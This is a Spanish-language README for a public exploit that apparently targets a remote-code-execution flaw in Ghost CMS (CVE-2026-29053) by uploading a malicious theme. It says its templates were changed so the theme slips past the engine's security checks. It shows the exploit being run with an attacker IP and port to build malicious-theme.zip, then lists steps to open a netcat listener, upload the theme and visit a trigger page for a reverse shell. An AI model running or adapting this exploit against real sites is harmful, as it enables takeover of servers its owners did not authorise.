
Vulnerabilidad (RCE) descubierta en Ghost CMS (que afecta específicamente a las versiones 0.7.2 hasta 6.19.0)
Este es un rediseño del Repo de rootxran para este mismo CVE - https://github.com/rootxran/CVE-2026-29053
Durante las pruebas contra entornos específicos de Ghost CMS, el payload del tema original provocó un Error Fatal de Handlebars. El CMS no pudo activar el tema malicioso porque hacía referencia a un helper obsoleto o faltante (social_url) dentro del archivo author.hbs.
He actualizado las plantillas de Handlebars para usar helpers nativos y compatibles. Esto garantiza que el tema pase las validaciones internas de Ghost, permitiendo que el exploit se active correctamente sin ser bloqueado por el analizador de seguridad del motor de temas.
Uso: (consulte el exploit original para la guía en video).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Sube el tema, crea una página con el slug 'rce'
3. Visita /rce/